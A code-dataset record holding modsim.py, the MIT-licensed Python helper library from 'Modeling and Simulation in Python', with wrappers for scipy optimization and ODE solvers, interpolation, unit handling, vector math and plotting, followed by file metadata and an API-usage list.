"call"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 151, "usage_type": 
"attribute"}]} +{"seq_id": "440811799", "text": "\"\"\"\nCode from Modeling and Simulation in Python.\n\nCopyright 2020 Allen Downey\n\nMIT License: https://opensource.org/licenses/MIT\n\"\"\"\n\nimport logging\n\nlogger = logging.getLogger(name=\"modsim.py\")\n\n# make sure we have Python 3.6 or better\nimport sys\n\nif sys.version_info < (3, 6):\n logger.warning(\"modsim.py depends on Python 3.6 features.\")\n\nimport inspect\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import InterpolatedUnivariateSpline\n\nfrom scipy.integrate import odeint\nfrom scipy.integrate import solve_ivp\n\nfrom types import SimpleNamespace\nfrom copy import copy\n\nimport pint\n\nunits = pint.UnitRegistry()\nQuantity = units.Quantity\n\n\ndef flip(p=0.5):\n \"\"\"Flips a coin with the given probability.\n\n p: float 0-1\n\n returns: boolean (True or False)\n \"\"\"\n return np.random.random() < p\n\n\ndef cart2pol(x, y, z=None):\n \"\"\"Convert Cartesian coordinates to polar.\n\n x: number or sequence\n y: number or sequence\n z: number or sequence (optional)\n\n returns: theta, rho OR theta, rho, z\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n\n rho = np.hypot(x, y)\n theta = np.arctan2(y, x)\n\n if z is None:\n return theta, rho\n else:\n return theta, rho, z\n\n\ndef pol2cart(theta, rho, z=None):\n \"\"\"Convert polar coordinates to Cartesian.\n\n theta: number or sequence in radians\n rho: number or sequence\n z: number or sequence (optional)\n\n returns: x, y OR x, y, z\n \"\"\"\n x = rho * np.cos(theta)\n y = rho * np.sin(theta)\n\n if z is None:\n return x, y\n else:\n return x, y, z\n\nfrom numpy import linspace\n\ndef linrange(start, stop, step=1, **options):\n \"\"\"Make an array of equally spaced values.\n\n start: first value\n stop: last value (might be approximate)\n step: difference between elements (should be consistent)\n\n returns: NumPy array\n \"\"\"\n n = int(round((stop-start) / step))\n return linspace(start, stop, n+1, **options)\n\n\ndef leastsq(error_func, x0, *args, **options):\n \"\"\"Find the parameters that yield the best fit for the data.\n\n `x0` can be a sequence, array, Series, or Params\n\n Positional arguments are passed along to `error_func`.\n\n Keyword arguments are passed to `scipy.optimize.leastsq`\n\n error_func: function that computes a sequence of errors\n x0: initial guess for the best parameters\n args: passed to error_func\n options: passed to leastsq\n\n :returns: Params object with best_params and ModSimSeries with details\n \"\"\"\n # override `full_output` so we get a message if something goes wrong\n options[\"full_output\"] = True\n\n # run leastsq\n t = scipy.optimize.leastsq(error_func, x0=x0, args=args, **options)\n best_params, cov_x, infodict, mesg, ier = t\n\n # pack the results into a ModSimSeries object\n details = ModSimSeries(infodict)\n details.set(cov_x=cov_x, mesg=mesg, ier=ier)\n\n # if we got a Params object, we should return a Params object\n if isinstance(x0, Params):\n best_params = Params(Series(best_params, x0.index))\n\n # return the best parameters and details\n return best_params, details\n\n\ndef minimize_scalar(min_func, bounds, *args, **options):\n \"\"\"Finds the input value that minimizes `min_func`.\n\n Wrapper for\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize_scalar.html\n\n min_func: computes the function to be minimized\n bounds: sequence of two values, lower and upper bounds of 
the range to be searched\n args: any additional positional arguments are passed to min_func\n options: any keyword arguments are passed as options to minimize_scalar\n\n returns: ModSimSeries object\n \"\"\"\n try:\n min_func(bounds[0], *args)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.minimize_scalar, I tried\n running the function you provided with the\n lower bound, and I got the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n underride(options, xatol=1e-3)\n\n res = scipy.optimize.minimize_scalar(\n min_func,\n bracket=bounds,\n bounds=bounds,\n args=args,\n method=\"bounded\",\n options=options,\n )\n\n if not res.success:\n msg = (\n \"\"\"scipy.optimize.minimize_scalar did not succeed.\n The message it returned is %s\"\"\"\n % res.message\n )\n raise Exception(msg)\n\n return res\n\n\ndef maximize_scalar(max_func, bounds, *args, **options):\n \"\"\"Finds the input value that maximizes `max_func`.\n\n Wrapper for https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize_scalar.html\n\n min_func: computes the function to be maximized\n bounds: sequence of two values, lower and upper bounds of the\n range to be searched\n args: any additional positional arguments are passed to max_func\n options: any keyword arguments are passed as options to minimize_scalar\n\n returns: ModSimSeries object\n \"\"\"\n def min_func(*args):\n return -max_func(*args)\n\n res = minimize_scalar(min_func, bounds, *args, **options)\n\n # we have to negate the function value before returning res\n res.fun = -res.fun\n return res\n\n\ndef minimize_golden(min_func, bracket, *args, **options):\n \"\"\"Find the minimum of a function by golden section search.\n\n Based on\n https://en.wikipedia.org/wiki/Golden-section_search#Iterative_algorithm\n\n :param min_func: function to be minimized\n :param bracket: interval containing a minimum\n :param args: arguments passes to min_func\n :param options: rtol and maxiter\n\n :return: ModSimSeries\n \"\"\"\n maxiter = options.get(\"maxiter\", 100)\n rtol = options.get(\"rtol\", 1e-3)\n\n def success(**kwargs):\n return ModSimSeries(dict(success=True, **kwargs))\n\n def failure(**kwargs):\n return ModSimSeries(dict(success=False, **kwargs))\n\n a, b = bracket\n ya = min_func(a, *args)\n yb = min_func(b, *args)\n\n phi = 2 / (np.sqrt(5) - 1)\n h = b - a\n c = b - h / phi\n yc = min_func(c, *args)\n\n d = a + h / phi\n yd = min_func(d, *args)\n\n if yc > ya or yc > yb:\n return failure(message=\"The bracket is not well-formed.\")\n\n for i in range(maxiter):\n\n # check for convergence\n if abs(h / c) < rtol:\n return success(x=c, fun=yc)\n\n if yc < yd:\n b, yb = d, yd\n d, yd = c, yc\n h = b - a\n c = b - h / phi\n yc = min_func(c, *args)\n else:\n a, ya = c, yc\n c, yc = d, yd\n h = b - a\n d = a + h / phi\n yd = min_func(d, *args)\n\n # if we exited the loop, too many iterations\n return failure(root=c, message=\"maximum iterations = %d exceeded\" % maxiter)\n\n\ndef maximize_golden(max_func, bracket, *args, **options):\n \"\"\"Find the maximum of a function by golden section search.\n\n :param min_func: function to be maximized\n :param bracket: interval containing a maximum\n :param args: arguments passes to min_func\n :param options: rtol and maxiter\n\n :return: ModSimSeries\n \"\"\"\n\n def min_func(*args):\n return -max_func(*args)\n\n res = minimize_golden(min_func, bracket, *args, **options)\n\n # we have to negate the function value before returning res\n res.fun = -res.fun\n return res\n\n\ndef 
minimize_powell(min_func, x0, *args, **options):\n \"\"\"Finds the input value that minimizes `min_func`.\n Wrapper for https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html\n min_func: computes the function to be minimized\n x0: initial guess\n args: any additional positional arguments are passed to min_func\n options: any keyword arguments are passed as options to minimize_scalar\n returns: ModSimSeries object\n \"\"\"\n underride(options, tol=1e-3)\n\n res = scipy.optimize.minimize(min_func, x0, *args, **options)\n\n return ModSimSeries(res)\n\n\n# make aliases for minimize and maximize\nminimize = minimize_golden\nmaximize = maximize_golden\n\n\ndef run_solve_ivp(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n `t_0` with the start time, and `t_end` with the end time.\n\n It can contain any other parameters required by the slope function.\n\n `options` can be any legal options of `scipy.integrate.solve_ivp`\n\n system: System object\n slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n system = remove_units(system)\n\n # make sure `system` contains `init`\n if not hasattr(system, \"init\"):\n msg = \"\"\"It looks like `system` does not contain `init`\n as a system variable. `init` should be a State\n object that specifies the initial condition:\"\"\"\n raise ValueError(msg)\n\n # make sure `system` contains `t_end`\n if not hasattr(system, \"t_end\"):\n msg = \"\"\"It looks like `system` does not contain `t_end`\n as a system variable. `t_end` should be the\n final time:\"\"\"\n raise ValueError(msg)\n\n # the default value for t_0 is 0\n t_0 = getattr(system, \"t_0\", 0)\n\n # try running the slope function with the initial conditions\n try:\n slope_func(t_0, system.init, system)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.solve_ivp, I tried\n running the slope function you provided with the\n initial conditions in `system` and `t=t_0` and I got\n the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # get the list of event functions\n events = options.get('events', [])\n\n # if there's only one event function, put it in a list\n try:\n iter(events)\n except TypeError:\n events = [events]\n\n for event_func in events:\n # make events terminal unless otherwise specified\n if not hasattr(event_func, 'terminal'):\n event_func.terminal = True\n\n # test the event function with the initial conditions\n try:\n event_func(t_0, system.init, system)\n except Exception as e:\n msg = \"\"\"Before running scipy.integrate.solve_ivp, I tried\n running the event function you provided with the\n initial conditions in `system` and `t=t_0` and I got\n the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # get dense output unless otherwise specified\n underride(options, dense_output=True)\n\n # run the solver\n bunch = solve_ivp(slope_func, [t_0, system.t_end], system.init,\n args=[system], **options)\n\n # separate the results from the details\n y = bunch.pop(\"y\")\n t = bunch.pop(\"t\")\n\n # get the column names from `init`, if possible\n if hasattr(system.init, 'index'):\n columns = system.init.index\n else:\n columns = range(len(system.init))\n\n # evaluate the results at equally-spaced points\n if options.get('dense_output', False):\n try:\n num = system.num\n except AttributeError:\n num = 51\n t_final = t[-1]\n t_array = linspace(t_0, t_final, num)\n y_array = bunch.sol(t_array)\n\n # pack 
the results into a TimeFrame\n results = TimeFrame(y_array.T, index=t_array,\n columns=columns)\n else:\n results = TimeFrame(y.T, index=t,\n columns=columns)\n\n return results, bunch\n\n\ndef check_system(system, slope_func):\n \"\"\"Make sure the system object has the fields we need for run_ode_solver.\n\n :param system:\n :param slope_func:\n :return:\n \"\"\"\n # make sure `system` contains `init`\n if not hasattr(system, \"init\"):\n msg = \"\"\"It looks like `system` does not contain `init`\n as a system variable. `init` should be a State\n object that specifies the initial condition:\"\"\"\n raise ValueError(msg)\n\n # make sure `system` contains `t_end`\n if not hasattr(system, \"t_end\"):\n msg = \"\"\"It looks like `system` does not contain `t_end`\n as a system variable. `t_end` should be the\n final time:\"\"\"\n raise ValueError(msg)\n\n # the default value for t_0 is 0\n t_0 = getattr(system, \"t_0\", 0)\n\n # get the initial conditions\n init = system.init\n\n # get t_end\n t_end = system.t_end\n\n # if dt is not specified, take 100 steps\n try:\n dt = system.dt\n except AttributeError:\n dt = t_end / 100\n\n return init, t_0, t_end, dt\n\n\ndef run_euler(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n `t_end` with the end time, and `dt` with the time step.\n\n `system` may contain `t_0` to override the default, 0\n\n It can contain any other parameters required by the slope function.\n\n `options` can be ...\n\n system: System object\n slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n # the default message if nothing changes\n msg = \"The solver successfully reached the end of the integration interval.\"\n\n # get parameters from system\n init, t_0, t_end, dt = check_system(system, slope_func)\n\n # make the TimeFrame\n frame = TimeFrame(columns=init.index)\n frame.row[t_0] = init\n ts = linrange(t_0, t_end, dt) * get_units(t_end)\n\n # run the solver\n for t1 in ts:\n y1 = frame.row[t1]\n slopes = slope_func(y1, t1, system)\n y2 = [y + slope * dt for y, slope in zip(y1, slopes)]\n t2 = t1 + dt\n frame.row[t2] = y2\n\n details = ModSimSeries(dict(message=\"Success\"))\n return frame, details\n\n\ndef run_ralston(system, slope_func, **options):\n \"\"\"Computes a numerical solution to a differential equation.\n\n `system` must contain `init` with initial conditions,\n and `t_end` with the end time.\n\n `system` may contain `t_0` to override the default, 0\n\n It can contain any other parameters required by the slope function.\n\n `options` can be ...\n\n system: System object\n slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n # the default message if nothing changes\n msg = \"The solver successfully reached the end of the integration interval.\"\n\n # get parameters from system\n init, t_0, t_end, dt = check_system(system, slope_func)\n\n # make the TimeFrame\n frame = TimeFrame(columns=init.index)\n frame.row[t_0] = init\n ts = linrange(t_0, t_end, dt) * get_units(t_end)\n\n event_func = options.get(\"events\", None)\n z1 = np.nan\n\n def project(y1, t1, slopes, dt):\n t2 = t1 + dt\n y2 = [y + slope * dt for y, slope in zip(y1, slopes)]\n return y2, t2\n\n # run the solver\n for t1 in ts:\n y1 = frame.row[t1]\n\n # evaluate the slopes at the start of the time step\n slopes1 = slope_func(y1, t1, system)\n\n # evaluate the slopes at the two-thirds point\n y_mid, t_mid = project(y1, t1, slopes1, 2 * dt / 3)\n 
slopes2 = slope_func(y_mid, t_mid, system)\n\n # compute the weighted sum of the slopes\n slopes = [(k1 + 3 * k2) / 4 for k1, k2 in zip(slopes1, slopes2)]\n\n # compute the next time stamp\n y2, t2 = project(y1, t1, slopes, dt)\n\n # check for a terminating event\n if event_func:\n z2 = event_func(y2, t2, system)\n if z1 * z2 < 0:\n scale = magnitude(z1 / (z1 - z2))\n y2, t2 = project(y1, t1, slopes, scale * dt)\n frame.row[t2] = y2\n msg = \"A termination event occurred.\"\n break\n else:\n z1 = z2\n\n # store the results\n frame.row[t2] = y2\n\n details = ModSimSeries(dict(success=True, message=msg))\n return frame, details\n\n\nrun_ode_solver = run_ralston\n\n# TODO: Implement leapfrog\n\n\ndef fsolve(func, x0, *args, **options):\n \"\"\"Return the roots of the (non-linear) equations\n defined by func(x) = 0 given a starting estimate.\n\n Uses scipy.optimize.fsolve, with extra error-checking.\n\n func: function to find the roots of\n x0: scalar or array, initial guess\n args: additional positional arguments are passed along to fsolve,\n which passes them along to func\n\n returns: solution as an array\n \"\"\"\n # make sure we can run the given function with x0\n try:\n func(x0, *args)\n except Exception as e:\n msg = \"\"\"Before running scipy.optimize.fsolve, I tried\n running the error function you provided with the x0\n you provided, and I got the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # make the tolerance more forgiving than the default\n underride(options, xtol=1e-6)\n\n # run fsolve\n result = scipy.optimize.fsolve(func, x0, args=args, **options)\n\n return result\n\n\ndef crossings(series, value):\n \"\"\"Find the labels where the series passes through value.\n\n The labels in series must be increasing numerical values.\n\n series: Series\n value: number\n\n returns: sequence of labels\n \"\"\"\n values = series.values - value\n interp = InterpolatedUnivariateSpline(series.index, values)\n return interp.roots()\n\n\ndef has_nan(a):\n \"\"\"Checks whether the an array contains any NaNs.\n\n :param a: NumPy array or Pandas Series\n :return: boolean\n \"\"\"\n return np.any(np.isnan(a))\n\n\ndef is_strictly_increasing(a):\n \"\"\"Checks whether the elements of an array are strictly increasing.\n\n :param a: NumPy array or Pandas Series\n :return: boolean\n \"\"\"\n return np.all(np.diff(a) > 0)\n\n\ndef interpolate(series, **options):\n \"\"\"Creates an interpolation function.\n\n series: Series object\n options: any legal options to scipy.interpolate.interp1d\n\n returns: function that maps from the index to the values\n \"\"\"\n if has_nan(series.index):\n msg = \"\"\"The Series you passed to interpolate contains\n NaN values in the index, which would result in\n undefined behavior. So I'm putting a stop to that.\"\"\"\n raise ValueError(msg)\n\n if not is_strictly_increasing(series.index):\n msg = \"\"\"The Series you passed to interpolate has an index\n that is not strictly increasing, which would result in\n undefined behavior. 
So I'm putting a stop to that.\"\"\"\n raise ValueError(msg)\n\n # make the interpolate function extrapolate past the ends of\n # the range, unless `options` already specifies a value for `fill_value`\n underride(options, fill_value=\"extrapolate\")\n\n # call interp1d, which returns a new function object\n x = series.index\n y = series.values\n interp_func = interp1d(x, y, **options)\n return interp_func\n\n\ndef interpolate_inverse(series, **options):\n \"\"\"Interpolate the inverse function of a Series.\n\n series: Series object, represents a mapping from `a` to `b`\n options: any legal options to scipy.interpolate.interp1d\n\n returns: interpolation object, can be used as a function\n from `b` to `a`\n \"\"\"\n inverse = Series(series.index, index=series.values)\n interp_func = interpolate(inverse, **options)\n return interp_func\n\n\ndef gradient(series, **options):\n \"\"\"Computes the numerical derivative of a series.\n\n If the elements of series have units, they are dropped.\n\n series: Series object\n options: any legal options to np.gradient\n\n returns: Series, same subclass as series\n \"\"\"\n x = series.index\n y = series.values\n\n a = np.gradient(y, x, **options)\n return series.__class__(a, series.index)\n\n\ndef source_code(obj):\n \"\"\"Prints the source code for a given object.\n\n obj: function or method object\n \"\"\"\n print(inspect.getsource(obj))\n\n\ndef underride(d, **options):\n \"\"\"Add key-value pairs to d only if key is not in d.\n\n If d is None, create a new dictionary.\n\n d: dictionary\n options: keyword args to add to d\n \"\"\"\n if d is None:\n d = {}\n\n for key, val in options.items():\n d.setdefault(key, val)\n\n return d\n\n\ndef contour(df, **options):\n \"\"\"Makes a contour plot from a DataFrame.\n\n Wrapper for plt.contour\n https://matplotlib.org/3.1.0/api/_as_gen/matplotlib.pyplot.contour.html\n\n Note: columns and index must be numerical\n\n df: DataFrame\n options: passed to plt.contour\n \"\"\"\n fontsize = options.pop(\"fontsize\", 12)\n underride(options, cmap=\"viridis\")\n x = df.columns\n y = df.index\n X, Y = np.meshgrid(x, y)\n cs = plt.contour(X, Y, df, **options)\n plt.clabel(cs, inline=1, fontsize=fontsize)\n\n\ndef savefig(filename, **options):\n \"\"\"Save the current figure.\n\n Keyword arguments are passed along to plt.savefig\n\n https://matplotlib.org/api/_as_gen/matplotlib.pyplot.savefig.html\n\n filename: string\n \"\"\"\n print(\"Saving figure to file\", filename)\n plt.savefig(filename, **options)\n\n\ndef decorate(**options):\n \"\"\"Decorate the current axes.\n\n Call decorate with keyword arguments like\n decorate(title='Title',\n xlabel='x',\n ylabel='y')\n\n The keyword arguments can be any of the axis properties\n https://matplotlib.org/api/axes_api.html\n \"\"\"\n ax = plt.gca()\n ax.set(**options)\n\n handles, labels = ax.get_legend_handles_labels()\n if handles:\n ax.legend(handles, labels)\n\n plt.tight_layout()\n\n\ndef remove_from_legend(bad_labels):\n \"\"\"Removes some labels from the legend.\n\n bad_labels: sequence of strings\n \"\"\"\n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n handle_list, label_list = [], []\n for handle, label in zip(handles, labels):\n if label not in bad_labels:\n handle_list.append(handle)\n label_list.append(label)\n ax.legend(handle_list, label_list)\n\n\nclass SettableNamespace(SimpleNamespace):\n \"\"\"Contains a collection of parameters.\n\n Used to make a System object.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n def 
__init__(self, namespace=None, **kwargs):\n super().__init__()\n if namespace:\n self.__dict__.update(namespace.__dict__)\n self.__dict__.update(kwargs)\n\n def get(self, name, default=None):\n \"\"\"Look up a variable.\n\n name: string varname\n default: value returned if `name` is not present\n \"\"\"\n try:\n return self.__getattribute__(name, default)\n except AttributeError:\n return default\n\n def set(self, **variables):\n \"\"\"Make a copy and update the given variables.\n\n returns: Params\n \"\"\"\n new = copy(self)\n new.__dict__.update(variables)\n return new\n\n\ndef magnitude(x):\n \"\"\"Returns the magnitude of a Quantity or number.\n\n x: Quantity or number\n\n returns: number\n \"\"\"\n return x.magnitude if hasattr(x, 'magnitude') else x\n\n\ndef remove_units(namespace):\n \"\"\"Removes units from the values in a Namespace.\n\n Only removes units from top-level values;\n does not traverse nested values.\n\n returns: new Namespace object\n \"\"\"\n res = copy(namespace)\n for label, value in res.__dict__.items():\n if isinstance(value, pd.Series):\n value = remove_units_series(value)\n res.__dict__[label] = magnitude(value)\n return res\n\n\ndef remove_units_series(series):\n \"\"\"Removes units from the values in a Series.\n\n Only removes units from top-level values;\n does not traverse nested values.\n\n returns: new Series object\n \"\"\"\n res = copy(series)\n for label, value in res.iteritems():\n res[label] = magnitude(value)\n return res\n\n\nclass System(SettableNamespace):\n \"\"\"Contains system parameters and their values.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n pass\n\n\nclass Params(SettableNamespace):\n \"\"\"Contains system parameters and their values.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n pass\n\n\ndef State(**variables):\n \"\"\"Contains the values of state variables.\"\"\"\n return pd.Series(variables)\n\n\ndef TimeSeries(*args, **kwargs):\n \"\"\"\n \"\"\"\n if args or kwargs:\n series = pd.Series(*args, **kwargs)\n else:\n series = pd.Series([], dtype=np.float64)\n\n series.index.name = 'Time'\n if 'name' not in kwargs:\n series.name = 'Quantity'\n return series\n\n\ndef SweepSeries(*args, **kwargs):\n \"\"\"\n \"\"\"\n if args or kwargs:\n series = pd.Series(*args, **kwargs)\n else:\n series = pd.Series([], dtype=np.float64)\n\n series.index.name = 'Parameter'\n if 'name' not in kwargs:\n series.name = 'Metric'\n return series\n\n\ndef TimeFrame(*args, **kwargs):\n \"\"\"DataFrame that maps from time to State.\n \"\"\"\n return pd.DataFrame(*args, **kwargs)\n\n\ndef SweepFrame(*args, **kwargs):\n \"\"\"DataFrame that maps from parameter value to SweepSeries.\n \"\"\"\n return pd.DataFrame(*args, **kwargs)\n\n\ndef Vector(x, y, z=None, **options):\n \"\"\"\n \"\"\"\n if z is None:\n return pd.Series(dict(x=x, y=y), **options)\n else:\n return pd.Series(dict(x=x, y=y, z=z), **options)\n\n\n## Vector functions (should work with any sequence)\n\ndef vector_mag(v):\n \"\"\"Vector magnitude.\"\"\"\n return np.sqrt(np.dot(v, v))\n\n\ndef vector_mag2(v):\n \"\"\"Vector magnitude squared.\"\"\"\n return np.dot(v, v)\n\n\ndef vector_angle(v):\n \"\"\"Angle between v and the positive x axis.\n\n Only works with 2-D vectors.\n\n returns: angle in radians\n \"\"\"\n assert len(v) == 2\n x, y = v\n return np.arctan2(y, x)\n\n\ndef vector_polar(v):\n \"\"\"Vector magnitude and angle.\n\n returns: (number, angle in radians)\n \"\"\"\n return vector_mag(v), vector_angle(v)\n\n\ndef vector_hat(v):\n 
\"\"\"Unit vector in the direction of v.\n\n returns: Vector or array\n \"\"\"\n # check if the magnitude of the Quantity is 0\n mag = vector_mag(v)\n if mag == 0:\n return v\n else:\n return v / mag\n\n\ndef vector_perp(v):\n \"\"\"Perpendicular Vector (rotated left).\n\n Only works with 2-D Vectors.\n\n returns: Vector\n \"\"\"\n assert len(v) == 2\n x, y = v\n return Vector(-y, x)\n\n\ndef vector_dot(v, w):\n \"\"\"Dot product of v and w.\n\n returns: number or Quantity\n \"\"\"\n return np.dot(v, w)\n\n\ndef vector_cross(v, w):\n \"\"\"Cross product of v and w.\n\n returns: number or Quantity for 2-D, Vector for 3-D\n \"\"\"\n res = np.cross(v, w)\n\n if len(v) == 3:\n return Vector(*res)\n else:\n return res\n\n\ndef vector_proj(v, w):\n \"\"\"Projection of v onto w.\n\n returns: array or Vector with direction of w and units of v.\n \"\"\"\n w_hat = vector_hat(w)\n return vector_dot(v, w_hat) * w_hat\n\n\ndef scalar_proj(v, w):\n \"\"\"Returns the scalar projection of v onto w.\n\n Which is the magnitude of the projection of v onto w.\n\n returns: scalar with units of v.\n \"\"\"\n return vector_dot(v, vector_hat(w))\n\n\ndef vector_dist(v, w):\n \"\"\"Euclidean distance from v to w, with units.\"\"\"\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)\n\n\ndef vector_diff_angle(v, w):\n \"\"\"Angular difference between two vectors, in radians.\n \"\"\"\n if len(v) == 2:\n return vector_angle(v) - vector_angle(w)\n else:\n # TODO: see http://www.euclideanspace.com/maths/algebra/\n # vectors/angleBetween/\n raise NotImplementedError()\n\n\ndef plot_segment(A, B, **options):\n \"\"\"Plots a line segment between two Vectors.\n\n For 3-D vectors, the z axis is ignored.\n\n Additional options are passed along to plot().\n\n A: Vector\n B: Vector\n \"\"\"\n xs = A.x, B.x\n ys = A.y, B.y\n plot(xs, ys, **options)\n\n\nfrom time import sleep\nfrom IPython.display import clear_output\n\ndef animate(results, draw_func, *args, interval=None):\n \"\"\"Animate results from a simulation.\n\n results: TimeFrame\n draw_func: function that draws state\n interval: time between frames in seconds\n \"\"\"\n plt.figure()\n try:\n for t, state in results.iterrows():\n draw_func(t, state, *args)\n plt.show()\n if interval:\n sleep(interval)\n clear_output(wait=True)\n draw_func(t, state, *args)\n plt.show()\n except KeyboardInterrupt:\n pass\n", "sub_path": "jupyter/modsim.py", "file_name": "modsim.py", "file_ext": "py", "file_size_in_byte": 28491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pint.UnitRegistry", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 124, 
"usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 124, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize_scalar", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 232, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 298, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 298, "usage_type": "attribute"}, {"api_name": "scipy.integrate.solve_ivp", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 523, "usage_type": "attribute"}, {"api_name": "scipy.optimize.fsolve", "line_number": 598, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 598, "usage_type": "attribute"}, {"api_name": "scipy.interpolate.InterpolatedUnivariateSpline", "line_number": 614, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 633, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 633, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 663, "usage_type": "call"}, {"api_name": "numpy.gradient", "line_number": 694, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 703, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 738, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 739, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 739, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clabel", "line_number": 740, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 753, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 753, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 774, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 774, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 782, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 782, "usage_type": "name"}, {"api_name": "types.SimpleNamespace", "line_number": 792, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 821, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 844, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 846, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 860, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 884, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 891, 